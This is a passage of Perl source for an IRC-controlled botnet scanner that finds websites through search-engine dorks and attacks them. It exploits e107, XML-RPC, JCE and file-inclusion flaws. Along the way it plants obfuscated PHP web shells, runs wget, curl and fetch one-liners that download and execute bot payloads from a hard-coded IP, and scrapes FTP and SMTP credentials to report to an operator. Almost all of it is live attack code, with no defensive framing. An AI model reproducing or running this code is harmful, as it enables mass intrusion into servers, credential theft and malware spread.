"ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=="; my $html = &e107_rce_query($test,$code); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { my $sys = $1; my $upload = ""; my $res = &e107_rce_query($test); if ($res =~ /lobexxx/) { my $check = &get_content($shellz); if ($check =~ /UnKnown - Simple Shell/) { &msg("$nick","$e107logo4$engine 4<9=4>9 SheLL 4<9=4>9 $shellz ");sleep(2); } } else { &msg("$chan","$e107logo4$engine 4<9=4>4 System 4<9=4>9 $test 4($sys) ");sleep(2); } } } exit; } } } } sub e107_rce_query() { my $url = $_[0]; my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2ltYWdlcy9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOwo="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); return $res->content; } sub e107_spread_query() { my $url = $_[0]; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveG1sLnR4dDtwZXJsIHhtbC50eHQ7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveHBsLnR4dDtwZXJsIHhwbC50eHQ7IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVzID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0Kd2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); } sub lfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$lfilogo4$engine 9Finished 4for 9$dork "); } my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../"; my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000"; my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) { my $res = lfi_env_query($test); # &lfi_spread_query($test); if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) { my $os = $1; my $uid = $2; my $lficheck = &get_content($shell); if ($lficheck =~ /UnKnown - Simple Shell/){ &msg("$nick","$lfilogo4$engine 4<9=4>9 SheLL 4<9=4>9 $shell 4(OS=$os) $uid "); &msg("$admin","$lfilogo4$engine 4<9=4>9 SheLL 4<9=4>9 $shell 4(OS=$os) $uid "); } else { &msg("$chan","$lfilogo4$engine 4<9=4>9 Vuln 4<9=4>9 $site 4(OS=$os) $uid "); } } } } exit; } } } } sub lfi_env_query() { my $url = $_[0]; my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZaYUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpadkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEwdk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlmVUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5WblJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5ZN09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhuUE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZYVnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZXaGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkzRkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1UrVzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVOamxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5USTRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZtR1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2NiRkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhRaHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1lK1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVFMzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFovTVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK'; my $ua = LWP::UserAgent->new(agent => ""); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } sub xml_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$xmllogo4$engine 9Finished 4for 9$dork "); } my $test = "http://".$site.$bug; my $vuln = "http://".$site."12".$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /faultcode/i ) { my $resp = &xml_cek_query2($test); if ($resp =~ /Byroe(.*)Lobex/s) { # &xml_spread_query($test);sleep(1); my $sys = $1; my $shell = "http://".$site."/lobex.php"; my $check = &get_content($shell); if ($check =~ /UnKnown - Simple Shell/) { my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$nick","$xmllogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$xmllogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } # else { # &msg("$chan","0,1$xmllogo(4@8$engine4)4(13@12SysTem4)10 ".$vuln." 3".$sys); sleep(1);} } } } exit; } } } } sub xml_cek_query() { my $url = $_[0]; my $code = "system('uname -a');"; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_cek_query2() { my $url = $_[0]; my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg=="; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_spread_query() { my $xmltargt = $_[0]; my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');"; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*"; $userAgent->timeout(7); my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit); } sub jce_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jcelogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; my $shell = "http://".$site."images/stories/food.php"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $status = &jce_upload($site);&jce_upload($site); if ($status = 1) { my $check = &get_content($shell."?rf"); if ($check =~ /UnKnown - Simple Shell/) { &get_content($shell."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+alb.txt%3Brm+alb*"); my $safe = ""; my $os = ""; my $uid = ""; my $ftphost = ""; my $ftpuser = ""; my $ftppass = ""; my $ftpopen = ""; my $smtphost = ""; my $smtpuser = ""; my $smtppass = ""; my $smtpauth = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$ftp_enable = '(.+?)';/i){$ftpopen=$1;} if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;} if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;} if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;} if ($check =~ m/\$smtpauth = '(.+?)';/i){$smtpauth=$1;} &msg("$chan","$jcelogo9$engine 4<9*4>9 Target Sent To 4<9-4>9 $nick4 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { &msg("$admin","$jcelogo9$engine 4<9*4>9 sHeLL 4<9-4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$nick","$jcelogo9$engine 4<9*4>9 sHeLL 4<9-4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$jcelogo9$engine 4<9*4>9 sHeLL 4<9-4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } if ($smtpauth =~ /1/) { &msg("$chan","9,1 [8SMTP4] Found on 8http://$site "); &msg("$admin","9,1 [8SMTP4] [ 8host : ".$smtphost." 4] [ 8login : ".$smtpuser." 4] [ 8pass : ".$smtppass." 4]"); } if ($ftpopen =~ /1/){ my $hozt = $site; $hozt =~ s/\///; &ftp($hozt,$ftpuser,$ftppass,$chan); } } } } exit; } if ($count == $num-1) { &msg("$chan","$jcelogo9,1$engine 0Finished 9for 0$dork "); if ($engine =~ /UoL/) { &sendraw("mode $chan -m"); } } } } } sub jce_upload() { my $success = 0; my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $path = $url; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $path =~ s/(.*)\/[^\/]*$/\1/; $path .= "/"; $path =~ s/([-a-zA-Z0-9\.]+)/$2/; if ($path eq "") { $path = "/" } $header1P = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $host"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 5000"; $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="food.gif"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aGlobex'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'food'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/food.gif","food.php"]}'; $header24 = "Content-Length: ".length($header25).""; my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; while ($hasil = <$remote>) { if ($hasil =~ /200 OK/) { $success = 1; } return $success; } } sub ftp() { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $chan = $_[3]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$admin","4,1 [8FTP4] [ 8host : ".$host." 4] [ 8login : ".$user." 4] [ 8pass : ".$pass." 4] 8Success "); &msg("$chan","4,1 [8FTP4] Found on 8http://$host "); } } exit; } } sub rci_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rcilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; foreach my $jpath(@jpaths) { my $shell = "http://".$site.$jpath.$jshell; my $vuln = "http://".$site.$jpath.$jvuln."?name=lobex21.php"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $status = &rci_upload($vuln); if ($status = 1) { my $check = &get_content($shell."?rf"); if ($check =~ /UnKnown - Simple Shell/) { &get_content($shell."?cmd=curl+-C+-+-O+".$botxx."perl alb.txt;rm -rf alb*"); my $safe = ""; my $os = ""; my $uid = ""; my $ftphost = ""; my 